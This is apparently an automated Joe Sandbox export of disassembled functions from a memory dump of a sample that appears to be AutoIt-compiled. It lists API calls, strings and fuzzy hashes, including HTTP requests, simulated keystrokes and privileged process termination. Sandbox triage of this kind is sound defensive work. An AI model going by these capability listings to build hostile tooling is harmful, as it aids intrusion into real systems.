Part of subcall function 00905D0A: GetWindowRect.USER32(?,?), ref: 00905D71
Part of subcall function 00905D0A: ScreenToClient.USER32(?,?), ref: 00905D99

GetDC.USER32 ref: 009446F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00944708
SelectObject.GDI32(00000000,00000000), ref: 00944716
SelectObject.GDI32(00000000,00000000), ref: 0094472B
ReleaseDC.USER32(?,00000000), ref: 00944733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009447C4

Strings

U, xrefs: 00944693

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: a0041da8a084e9102f685cbd91c6eb40deaf6452782267455b5176c6e1ed68f6
Instruction ID: 26212c9a1f20bf93c8ed77b6533bff2f89b6fc025548e6d8f60eafb498d8deb2
Opcode Fuzzy Hash: a0041da8a084e9102f685cbd91c6eb40deaf6452782267455b5176c6e1ed68f6
Instruction Fuzzy Hash: 6071E031500205DFDF218F68C984FBA7BB9FF4A364F14426AE9555A2A6C7319C82EF60

Function 0097359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009735E4

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

LoadStringW.USER32(009D2390,?,00000FFF,?), ref: 0097360A

Strings

Line %d (File "%s"):, xrefs: 0097366B
"%s" (%d) : ==> %s:%s%s, xrefs: 00973724
^ ERROR, xrefs: 009736C9
"%s" (%d) : ==> %s:, xrefs: 00973742
Error: , xrefs: 009736EF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 35cc7e27718c7681ec0888d7c41f6dcf0e7f68e777bae13b3b65e34885494a2d
Instruction ID: 1daa9eb6e8cf8ac2f69fa306d8b86b258fb119aad7bbf11773e881b6efc6da19
Opcode Fuzzy Hash: 35cc7e27718c7681ec0888d7c41f6dcf0e7f68e777bae13b3b65e34885494a2d
Instruction Fuzzy Hash: 72515072D00209BEDF14EBA0DC42FEEBB79AF54340F548125F505721A2EB311A99DFA1

Function 00998B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00919BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00919BB2

Part of subcall function 0091912D: GetCursorPos.USER32(?), ref: 00919141
Part of subcall function 0091912D: ScreenToClient.USER32(00000000,?), ref: 0091915E
Part of subcall function 0091912D: GetAsyncKeyState.USER32(00000001), ref: 00919183
Part of subcall function 0091912D: GetAsyncKeyState.USER32(00000002), ref: 0091919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00998B6B
ImageList_EndDrag.COMCTL32 ref: 00998B71
ReleaseCapture.USER32 ref: 00998B77
SetWindowTextW.USER32(?,00000000), ref: 00998C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00998C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00998CFF

Strings

@GUI_DRAGFILE, xrefs: 00998C9A
@GUI_DROPID, xrefs: 00998C51

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: a10b02a789e314d6d2fd947b25a0c555d5612923893fab21d1fd3273c742cf8a
Instruction ID: b4f0ddf8b05b9cf8c26a35c415433e93bda3bb6d41885dfeaae6dcac8e7a7d8a
Opcode Fuzzy Hash: a10b02a789e314d6d2fd947b25a0c555d5612923893fab21d1fd3273c742cf8a
Instruction Fuzzy Hash: 0851AC71209304AFDB04DF18DC65FAA77E4FB89754F40062EF996672E2DB309944CB62

Function 0097C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0097C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0097C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0097C2CA
GetLastError.KERNEL32 ref: 0097C322
SetEvent.KERNEL32(?), ref: 0097C336
InternetCloseHandle.WININET(00000000), ref: 0097C341

Strings

, xrefs: 0097C2BB

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 37dc7e7b0578a5332f0b6563d0dc2a9dbfa0d58e5928ebdabe3c844fc35f1267
Instruction ID: cd1e1f3b79130c7a2a1fbebce1e5a3253da6e101b42b117cdf22e085090ee28d
Opcode Fuzzy Hash: 37dc7e7b0578a5332f0b6563d0dc2a9dbfa0d58e5928ebdabe3c844fc35f1267
Instruction Fuzzy Hash: E0315CF2604608AFDB219FA89C88AAB7BFCEB49744F14C51EF44AD2201DB34DD449B71

Function 0096989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00943AAF,?,?,Bad directive syntax error,0099CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009698BC
LoadStringW.USER32(00000000,?,00943AAF,?), ref: 009698C3

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00969987

Strings

Line %d (File "%s"):, xrefs: 0096992D
Line %d:, xrefs: 00969912
., xrefs: 0096996D
Error: , xrefs: 00969955
%s (%d) : ==> %s.: %s %s, xrefs: 009698F1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: acd4884cae658232342db26b71742936dcac5805251dc07addd4c6fb0298cce6
Instruction ID: 53c20d9d35f3118dd1ae175916e1882e2d47a48adbc84397c28508015138e347
Opcode Fuzzy Hash: acd4884cae658232342db26b71742936dcac5805251dc07addd4c6fb0298cce6
Instruction Fuzzy Hash: 37217C32D1421EAFCF15AFA0CC46FEE7739BF58304F04846AF519620A2EB31A658DB11

Function 0096209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009620AB
GetClassNameW.USER32(00000000,?,00000100), ref: 009620C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0096214D

Strings

SHELLDLL_DefView, xrefs: 009620CC
largeicons, xrefs: 009620E1
smallicons, xrefs: 00962115
details, xrefs: 009620FB
list, xrefs: 0096212F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: b310e0c064a3bbb9942a8750a855e0edf6d57fd35af344784a628da71b8b6d35
Instruction ID: bc50f763392be02307135a04c8301b86b2d3de616d23e7a6ed2abfda897bd854
Opcode Fuzzy Hash: b310e0c064a3bbb9942a8750a855e0edf6d57fd35af344784a628da71b8b6d35
Instruction Fuzzy Hash: 941129B668CB17BAF6016324EC07EE6779CCB56328B22001BFB04B50E5FE65BC426615

Function 0093CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0093CEB7
_free.LIBCMT ref: 0093CF22
_free.LIBCMT ref: 0093CF48
_free.LIBCMT ref: 0093CF71
_free.LIBCMT ref: 0093CFA9
_free.LIBCMT ref: 0093CFDA
_free.LIBCMT ref: 0093D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0093D09C
_free.LIBCMT ref: 0093D0B5

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: c23264a3c811161d40c8834054e195a16fe02cadb0def6dcf55aa2150720fc3c
Instruction ID: 36c7e1d8f1f12764a3de604f65b11041a928132a1e0a00257226a5b9f0d29172
Opcode Fuzzy Hash: c23264a3c811161d40c8834054e195a16fe02cadb0def6dcf55aa2150720fc3c
Instruction Fuzzy Hash: D86168B1909710AFDB25AFB4A892B6E7BAAEF85310F04416EF940B7281D7329D40DF50

Function 00918B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00956890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009568A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009568B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009568D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009568F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00918874,00000000,00000000,00000000,000000FF,00000000), ref: 00956901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0095691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00918874,00000000,00000000,00000000,000000FF,00000000), ref: 0095692D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: db44aab7d3ee97cbca5aa48dd2e8544f9d324dd9d298b4b1573b11aad26c1bf9
Instruction ID: 8cc5f9eca2c6272a5eb0e1eaf06f7850df948fd2ca8625304b414c4d71f16293
Opcode Fuzzy Hash: db44aab7d3ee97cbca5aa48dd2e8544f9d324dd9d298b4b1573b11aad26c1bf9
Instruction Fuzzy Hash: F151ACB0654209EFDB20CF29CC61FAA7BB9FF48351F104519F906972A0DB70E990EB50

Function 0097C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0097C182
GetLastError.KERNEL32 ref: 0097C195
SetEvent.KERNEL32(?), ref: 0097C1A9

Part of subcall function 0097C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0097C272
Part of subcall function 0097C253: GetLastError.KERNEL32 ref: 0097C322
Part of subcall function 0097C253: SetEvent.KERNEL32(?), ref: 0097C336
Part of subcall function 0097C253: InternetCloseHandle.WININET(00000000), ref: 0097C341

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 0215dbc8f748607da1eeb34549c95f592abef94eb3a302b82ebe9826794c02d7
Instruction ID: f345168306353dcbf6bfdcf80322ebb70c90f1235a3e6032f55423ef758a94b7
Opcode Fuzzy Hash: 0215dbc8f748607da1eeb34549c95f592abef94eb3a302b82ebe9826794c02d7
Instruction Fuzzy Hash: 713192F2204601BFDB219FE9DC44A66BBFCFF58310B54842EF96A82611D730E914EB60

Function 009625A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00963A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00963A57
Part of subcall function 00963A3D: GetCurrentThreadId.KERNEL32 ref: 00963A5E
Part of subcall function 00963A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009625B3), ref: 00963A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 009625BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009625DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009625DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 009625E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00962601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00962605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0096260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00962623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00962627

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 85736f506cfb02fe3c881473bee1a5721b97b614fe363c78e425140260ddbf0b
Instruction ID: 9c12c8b0601d094efcd591803bb2c5febb489bfa8e49cf08e28259bfec60b728
Opcode Fuzzy Hash: 85736f506cfb02fe3c881473bee1a5721b97b614fe363c78e425140260ddbf0b
Instruction Fuzzy Hash: 9E01D870398610BBFB20676DDC8AF593F5DDF8EB52F100012F314AE0D1C9E11444DA69

Function 00961803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00961449,?,?,00000000), ref: 0096180C
HeapAlloc.KERNEL32(00000000,?,00961449,?,?,00000000), ref: 00961813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00961449,?,?,00000000), ref: 00961828
GetCurrentProcess.KERNEL32(?,00000000,?,00961449,?,?,00000000), ref: 00961830
DuplicateHandle.KERNEL32(00000000,?,00961449,?,?,00000000), ref: 00961833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00961449,?,?,00000000), ref: 00961843
GetCurrentProcess.KERNEL32(00961449,00000000,?,00961449,?,?,00000000), ref: 0096184B
DuplicateHandle.KERNEL32(00000000,?,00961449,?,?,00000000), ref: 0096184E
CreateThread.KERNEL32(00000000,00000000,00961874,00000000,00000000,00000000), ref: 00961868

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: ce5cca90ee27e412d3a4a12417d075ccbc9e70f5e307fa4f0d5ead742bcea3e8
Instruction ID: 8f61f5368eab2c20eb6f67560d7bf257eb8b52de3b835f6c1a090f6ded6f472e
Opcode Fuzzy Hash: ce5cca90ee27e412d3a4a12417d075ccbc9e70f5e307fa4f0d5ead742bcea3e8
Instruction Fuzzy Hash: 4201BFB5254304BFE720AB69DD4EF5B3B6CEB89B11F404411FA05DB1A1C6709800DB34

Function 0098A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0096D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0096D501
Part of subcall function 0096D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0096D50F
Part of subcall function 0096D4DC: CloseHandle.KERNEL32(00000000), ref: 0096D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0098A16D
GetLastError.KERNEL32 ref: 0098A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0098A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0098A268
GetLastError.KERNEL32(00000000), ref: 0098A273
CloseHandle.KERNEL32(00000000), ref: 0098A2C4

Strings

SeDebugPrivilege, xrefs: 0098A18F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: f842f70d53cfb47958c514da9ccacbc3e2a31d457f1254aea61619da6cb0382e
Instruction ID: 08e596cce4888f6b4557e345b7f7d359b100ea41f45549d0bbc06ceff6be14cb
Opcode Fuzzy Hash: f842f70d53cfb47958c514da9ccacbc3e2a31d457f1254aea61619da6cb0382e
Instruction Fuzzy Hash: 376193712082429FE720EF18C894F15BBE5AF94318F14849DE4664B7A3C776ED45CB92

Function 00993886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00993925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0099393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00993954
_wcslen.LIBCMT ref: 00993999
SendMessageW.USER32(?,00001057,00000000,?), ref: 009939C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 009939F4

Strings

SysListView32, xrefs: 009938F7

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 5df4401a1f37254dcb001f5d4cb262768b2e96ad418acbaf06a9f55fc6d4e607
Instruction ID: a3d90aa0e633fc970a4752e3b61d59339518c23a87196f5dc904c324a83a071f
Opcode Fuzzy Hash: 5df4401a1f37254dcb001f5d4cb262768b2e96ad418acbaf06a9f55fc6d4e607
Instruction Fuzzy Hash: 1041A571A00219ABEF21DFA8CC45FEA7BA9EF48354F10452AF958E7281D7759D80CB90

Function 0096BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0096BCFD
IsMenu.USER32(00000000), ref: 0096BD1D
CreatePopupMenu.USER32 ref: 0096BD53
GetMenuItemCount.USER32(016753F0), ref: 0096BDA4
InsertMenuItemW.USER32(016753F0,?,00000001,00000030), ref: 0096BDCC

Strings

2, xrefs: 0096BD37
0, xrefs: 0096BCA8

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 19fbe71c80b4bc28cded40fa388b4987b62977e4b53c6625e7ce0d6b600dac4f
Instruction ID: ad758a7a2f9289fe7becaed9277a05ebaa417d3a4d0815b0e46b0a591e8c56b7
Opcode Fuzzy Hash: 19fbe71c80b4bc28cded40fa388b4987b62977e4b53c6625e7ce0d6b600dac4f
Instruction Fuzzy Hash: 6351ADF0A04205ABDF20CFA8D894BAEBBFCAF85314F14461AF551DB2D1E7749981CB61

Function 0096C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0096C913

Strings

blank, xrefs: 0096C895
info, xrefs: 0096C8B4
stop, xrefs: 0096C8E4
warning, xrefs: 0096C8FC
question, xrefs: 0096C8CC

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 34352dfab65d8b367d6d30c587b64cffc67bb53f2fe25093d20f6b66cac47f96
Instruction ID: 52be9d85e726ac94b54cfb7d46ef202bc22916fc202c00498e2b9a66c4b009b4
Opcode Fuzzy Hash: 34352dfab65d8b367d6d30c587b64cffc67bb53f2fe25093d20f6b66cac47f96
Instruction Fuzzy Hash: 10115C72A89306BAE7049B54EC83EBE379CDF55358B20042FF544E62C2E7B45E005365

